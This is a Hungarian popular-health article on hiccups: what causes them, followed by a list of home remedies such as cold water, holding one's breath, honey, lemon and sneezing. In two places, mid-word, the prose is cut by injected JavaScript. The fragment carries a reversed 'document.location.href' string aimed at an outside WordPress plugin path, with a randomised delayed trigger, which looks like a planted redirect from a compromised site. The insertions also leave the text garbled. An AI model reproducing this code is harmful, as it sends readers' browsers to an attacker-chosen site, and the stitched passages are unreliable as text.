A csuklás egy kellemetlen, a szervezet számára ráadásul teljesen haszontalan jelenség, amitől mindannyian szenvedtünk már életünkben. A csuklás voltaképp nem más, mint a rekeszizom akaratlan görcse, aminek során gyors belégzés jön létre. A jellegzetes hangjelenséget azért tapasztaljuk ilyenkor, mert a levegő a reflexesen záródó hangrésen keresztül kipréselődik.
A csuklást legtöbbször a gyomor és a belek izgatása okozza, ha teljesen ártalmatlan és egyszeri, akkor kiválthatja a gyomor feszülése, alkoholfogyasztás, stressz, nevetés, izgalom és hőmérséklet-váltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozás is. Ez a fajta csuklás idővel magától megszűnik, de ezt meggyorsíthatjuk házi praktikákkal is – írja a Házipatika.
Bár a csuklás általában egy idő után magától is elmúlik, a kellemetlen érzés miatt szeretnénk minél hamarabb abbahagyni.
Összegyűjtöttünk néhány remek tippet:
Rántsuk meg a nyelvünket – ezzel stimuláljuk a bolygóideget, amely az agy és a gyomor közti összeköttetést biztoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tosítja. A rángatással azt jelezzük testünknek, hogy emésszen gyorsabban, ezáltal nagyobb nyomás terhelődik a gyomorra és a rekeszizomra, így abbamaradhat a csuklás.
Igyunk egy pohár hideg vizet – talán ez a leggyakoribb gyógymód. Többek szerint be kellene fogni az orrunkat ivás közben, mások azt tanácsolják, hogy lehajolva kellene inni a pohár túlfeléről, van, aki szerint szigorúan hét kicsi kortyot. Bár elméletben a hideg víztől a gyomor összeszűkülhet egy kicsit, aminek révén kinyomódik belőle a levegőtöbblet, de ez még nem lesz feltétlenül elég.
Tartsuk vissza a lélegzetünket – erről már Platón is írt, úgyhogy elég régóta ismert módszer. Ha bent tartjuk a levegőt, az kilapítja és megnyújtja a rekeszizmot, ami ennek révén megnyugszik és abbamarad a csuklás is. Mások inkább arra esküsznek, hogy három-öt mély levegőt kell venni és ezeket öt–hat másodperc után kell csak kifújni.
Kérjünk meg valakit, hogy ijesszen meg minket – ez filmekben és képregényekben nagyon jól működik, a valós életben kevésbé. Ez elméletileg az adrenalintermelésünket ugrasztaná meg, amely felülírja a csuklási reflexet. Ha működik, örüljünk, mert bizonyíték nincs a hatásosságára.
Nyomkodjuk meg a fülcimpánkat – a bolygóideg a fülcimpánkhoz kapcsolódik, ezzel a mozdulatsorral tehát stimulálhatjuk az ideget és csökkenthetjük a rekeszizom terhelését.
Tegyünk mézet a nyelvünk alá – a méz édessége ízrohamot indít el a szánkban, ez stimulálja a bolygóideget, és azt üzeni az agynak, hogy gyomrunknak ürülnie kell, ez pedig ellazítja a rekeszizmot.
Igyunk egy kis tabasco szószt – míg a csípős ételek sokaknak okoznak csuklást, mások azt mondják, hogy pont ez a gyógymód: a csípős érzettől ugyanis figyelmünk elterelődik és pont ez kell ahhoz, hogy megszűnjön a csuklás.
Húzzuk fel a térdünket a mellkasunkhoz – üljünk le, húzzuk fel a térdeinket a mellkasunkhoz és hajoljunk bele: ezzel ugyanis nyomást gyakorlunk a rekeszizmunkra, ez pedig megszakíthatja az izomösszehúzódásokat.
Együnk meg egy szelet citromot – a citrom is gyors segítség lehet és általában minden háztartásban kézügyben van. A savanyú íztől összerándult száj hamar beleszólhat a csuklásba, leállítva a rekeszizom összehúzódását.
Próbáljunk tüsszenteni – a rekeszizom tüsszentés során erősen összehúzódik, amitől elmúlik a korábbi, csuklást kiváltó görcsös állapot.